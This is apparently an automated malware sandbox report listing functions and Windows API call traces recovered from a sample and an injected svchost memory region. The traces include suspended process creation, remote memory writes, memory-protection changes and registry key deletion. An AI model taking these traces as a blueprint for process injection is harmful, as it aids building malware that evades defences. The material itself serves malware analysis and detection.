Instruction Fuzzy Hash: F011D872844219ABC700AFA2DC04D5BBFACEF857A8F124A29FD5093150D73299168FB2

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02EC4EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02EC4F35

Part of subcall function 02EC49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000), ref: 02EC4A7A
Part of subcall function 02EC49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000,?,?,?), ref: 02EC4A81
Part of subcall function 02EC49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000), ref: 02EC4A92
Part of subcall function 02EC49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000,?,?,?), ref: 02EC4A99

ResumeThread.KERNEL32(02EC49A2,?,?,?), ref: 02EC4F51
CloseHandle.KERNEL32(02EC49A2,?,?,?), ref: 02EC4F5A

Strings

D, xrefs: 02EC4F02

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 46442dcf8cc15a9ac6ef45b80d3a46946311d2fa08b5b057cac98836e619d99e
Instruction ID: c59eaef303a0410a75c8bb15d9f5ddd4e5c94b5ce9124e16e9f8ed6beeaa157e
Opcode Fuzzy Hash: 46442dcf8cc15a9ac6ef45b80d3a46946311d2fa08b5b057cac98836e619d99e
Instruction Fuzzy Hash: B7014CB298020CBFEB409AE9DD85DEFB7BDFB08314F605829F605E2050E6309D158A61

Uniqueness

Uniqueness Score: -1.00%

Function 02EC27E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02EC27F9
CreateProcessW.KERNEL32(00000000,02EC62F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02EC2825
ExitProcess.KERNEL32 ref: 02EC282C

Strings

D, xrefs: 02EC2800

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: ed59a6a2bfe6eac4ab35ada6c230e44c9af02ec8d67e42a4fff6e6dce0b49c03
Instruction ID: 12e016cdfefa2d5d972ea772d9e9dd1833cafcd86a25cb20ca5396c53aeee3cf
Opcode Fuzzy Hash: ed59a6a2bfe6eac4ab35ada6c230e44c9af02ec8d67e42a4fff6e6dce0b49c03
Instruction Fuzzy Hash: 31E06DB188020C7EE740DAF9CD85EEFB3BCAB08304F500834B706E2000D678AE1D8B66

Uniqueness

Uniqueness Score: -1.00%

Function 02EC5208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC525E
Sleep.KERNEL32(00001388), ref: 02EC5271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC5327
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC5333

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: fb4a714e25a08ae73f1b831df2283c5d3c12fa0ff5b8abf5b107cb9f16d9faf4
Instruction ID: 194c5b230ae57d1c0b68867d28503b1704c31b12fc69126bfbcee5ac0fbc6014
Opcode Fuzzy Hash: fb4a714e25a08ae73f1b831df2283c5d3c12fa0ff5b8abf5b107cb9f16d9faf4
Instruction Fuzzy Hash: 9E4102714843009BC724CFE4C948B6BB7F8EF44319FA48E2DF199A2180DB34E54ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 02EC5B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02EC5B64

Part of subcall function 02EC2F1A: CryptAcquireContextW.ADVAPI32(02EC7658,00000000,00000000,00000001,F0000000,02EC62B0,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F35
Part of subcall function 02EC2F1A: CryptCreateHash.ADVAPI32(02EC7658,00008003,00000000,00000000,?,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F52
Part of subcall function 02EC2F1A: CryptHashData.ADVAPI32(?,02EC7658,?,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F68
Part of subcall function 02EC2F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F83
Part of subcall function 02EC2F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02EC5B88,?,00000000,?), ref: 02EC2FA3
Part of subcall function 02EC2F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2FB3
Part of subcall function 02EC2F1A: CryptReleaseContext.ADVAPI32(02EC7658,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2FC2

Part of subcall function 02EC44D2: wsprintfA.USER32 ref: 02EC4509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02EC5BF4

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 1a68dc14b9166929df0f104e265c387c54d0fd31802ef2afe94f6dd2c364dded
Instruction ID: 3d2c4039b44761a7f0ac6561385f201437bab3f26f599cd926b2b1fb5f791e35
Opcode Fuzzy Hash: 1a68dc14b9166929df0f104e265c387c54d0fd31802ef2afe94f6dd2c364dded
Instruction Fuzzy Hash: 3121F0724842089EDB118FE4CD94EEEBFACEB05310F789459F915E2101D720A196CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02EC3904,?,00000000,00000000,00000000,00000007,?,?), ref: 02EC3855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02EC3904), ref: 02EC385C

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: fd6bbb6d8e9b50b5be7353338253e637717c09dfaf083125807290f126535c4b
Instruction ID: c20c8cc95b217529414faff3cac181e646b9a5f4ec1720c6da0411627dde6b14
Opcode Fuzzy Hash: fd6bbb6d8e9b50b5be7353338253e637717c09dfaf083125807290f126535c4b
Instruction Fuzzy Hash: 5411B472A883418FC7308EA9D944B56B7E9EF85608F28D86DE5D2C7384D730E483CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02EC540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02EC542D
RtlAllocateHeap.NTDLL(00000000), ref: 02EC5434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC5496
HeapFree.KERNEL32(00000000), ref: 02EC549D

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: fcdbee67cd90e7ade5dbcef8704b881e68113b61b5a9e6534d1aa21030fd0ea2
Instruction ID: 9a739e81421c14557f50740d6afe52bae3957e0631def62390430f301d381508
Opcode Fuzzy Hash: fcdbee67cd90e7ade5dbcef8704b881e68113b61b5a9e6534d1aa21030fd0ea2
Instruction Fuzzy Hash: 9E113D769802146BCB105DE58D48EA7B76DBB88611FA0C569FE4AF3204DA30E4428B70

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000), ref: 02EC4AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02EC4ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02EC4B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02EC4B11

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 1f510c91d8ec002bdab76f86edef465eeb4cb8ab54df52d9a1cdc7132b1db249
Instruction ID: ec6b91f4ca3d5a1d85e3574a2849b66c39d8d0e4e97823e000282ec7297b8775
Opcode Fuzzy Hash: 1f510c91d8ec002bdab76f86edef465eeb4cb8ab54df52d9a1cdc7132b1db249
Instruction Fuzzy Hash: DC119171A80701ABEB619FB5DD15F12BBE8AB04314F28C82DF686C6290FB31D452DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC14DF
HeapFree.KERNEL32(00000000), ref: 02EC14E6

Strings

!, xrefs: 02EC14A3
!, xrefs: 02EC14C6

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: c1a23e384307401c8ebc13146ea92c5a1fec8a8d7cdde3c19ee1600f1d0ed594
Instruction ID: 159ad194e4e2afaec2a78d3bec99a1fec737f87de7fb045e7a079e1d3856b4d7
Opcode Fuzzy Hash: c1a23e384307401c8ebc13146ea92c5a1fec8a8d7cdde3c19ee1600f1d0ed594
Instruction Fuzzy Hash: 97F0F0326C02146EFB105AF4DD09BF67B8DEB05765F68D028FD08CD282EA70D892C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC25E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02EC7328), ref: 02EC25F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02EC2612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02EC2623
GetLastError.KERNEL32 ref: 02EC262D

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: 95a0dc476eb014673846ca3a297b23ede1bfb1663340cf1fb59784793610c761
Instruction ID: 1a77f7c3c82272bcb07aa82ccd8df55afbcb4e6b0a78fc9bd65e19591e952652
Opcode Fuzzy Hash: 95a0dc476eb014673846ca3a297b23ede1bfb1663340cf1fb59784793610c761
Instruction Fuzzy Hash: B4F09031A84248ABE72066F79C4EEAFBBBCEBC5B14F60802EF905C1140EA149416CF31

Uniqueness

Uniqueness Score: -1.00%

Function 02EC49EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000), ref: 02EC4A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000,?,?,?), ref: 02EC4A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000), ref: 02EC4A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02EC4F4C,?,00000000,?,?,?), ref: 02EC4A99

Part of subcall function 02EC4B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02EC4C69

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: f90ee841376afa25c94cf10dfec354f697a1da71d46fa5dd01505f7a3e1fc311
Instruction ID: 6285910daf802a134b7586b5e649c83cc8e9e66aff473fa306ee942aa0cde7a7
Opcode Fuzzy Hash: f90ee841376afa25c94cf10dfec354f697a1da71d46fa5dd01505f7a3e1fc311
Instruction Fuzzy Hash: 3A214D768483159FC710DFE4D45494BBBE8FB88254F64892EF589D7240EB30D9468F86

Uniqueness

Uniqueness Score: -1.00%

Function 02EC136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC13EC
HeapFree.KERNEL32(00000000), ref: 02EC13F3

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 719b4f9ae655dff050609289ab66d74abe2ff71ac42934c7a0af093e3a4c0b72
Instruction ID: 69b7b10996bc967b740fb98a9533338236097d69df9ceae03ad34a3ffb3b79a4
Opcode Fuzzy Hash: 719b4f9ae655dff050609289ab66d74abe2ff71ac42934c7a0af093e3a4c0b72
Instruction Fuzzy Hash: D0115476D84209ABDF00DFE98A44BDFBBBCEB48255F618469E608E6101D73085528BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC146A
HeapFree.KERNEL32(00000000), ref: 02EC1471
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC147E
HeapFree.KERNEL32(00000000), ref: 02EC1485

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 7eabde005590f61c7d93030060c0d8c3feda031b6c2b7ecc93d446cbcfc63530
Instruction ID: 1f9bbf6c5db15223c79ab5e81eec8bbb60f4f07fa1a7804a063064c038d8ebd1
Opcode Fuzzy Hash: 7eabde005590f61c7d93030060c0d8c3feda031b6c2b7ecc93d446cbcfc63530
Instruction Fuzzy Hash: FD115171D80209ABDB009FE98A44BDFFBBCBF09314F60846AE909E7101D7719645CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC1CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02EC1CFD
Part of subcall function 02EC1CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02EC1D04
Part of subcall function 02EC1CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02EC1D2D
Part of subcall function 02EC1CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02EC1DF6
Part of subcall function 02EC1CD5: HeapFree.KERNEL32(00000000), ref: 02EC1DFD
Part of subcall function 02EC1CD5: Sleep.KERNEL32(00001388), ref: 02EC1E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02EC1FB4
HeapFree.KERNEL32(00000000), ref: 02EC1FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC1FC3
HeapFree.KERNEL32(00000000), ref: 02EC1FCA

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: a44fd5760c45576db69f7eabddd9fae9de396cb53b3ceffc8fd28958d3618caf
Instruction ID: 719a004ee0ec9ee856ce974fcf5ba2179a947ed6323b990cd9c8c41f78817164
Opcode Fuzzy Hash: a44fd5760c45576db69f7eabddd9fae9de396cb53b3ceffc8fd28958d3618caf
Instruction Fuzzy Hash: CE01D7718483459FC710DFA6D908A9BBBE8AF49214F40891EF599D2200E735E2558FA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tfykdkdkdk.exePID: 6408, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	71.2%
Signature Coverage:	0%
Total number of Nodes:	208
Total number of Limit Nodes:	12

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 3, xrefs: 004010E9
Stop ok, xrefs: 00401180
fail 2, xrefs: 0040112E
Start, xrefs: 00401167
Stop Err, xrefs: 00401187
fail 1, xrefs: 0040114E

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 005204F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,00520000), ref: 005205D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,0052003A), ref: 0052060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 0052066F
VirtualFree.KERNELBASE(00540000,00000000,00008000), ref: 005206A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,005204CF), ref: 005207B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,005204CF), ref: 005207DB

Part of subcall function 005203A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005203DA

VirtualProtect.KERNELBASE(00400000,?,00000002,005204CF), ref: 005208A1
VirtualProtect.KERNELBASE(00400000,?,00000002,005204CF,?), ref: 005208F7
VirtualFree.KERNELBASE(00540000,00000000,00008000), ref: 0052091B

Memory Dump Source

Source File: 00000012.00000002.1953503178.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_520000_tfykdkdkdk.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 791ffc47c68d26b2bb3d1b63434a224d4a22e765a7efa298a6a0cb661ec5240b
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 90D18D72700211DFEB15EF14CC80F527BA6FF65710B890294ED0D9F6AADB70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000012.00000002.1953324734.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_421000_tfykdkdkdk.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
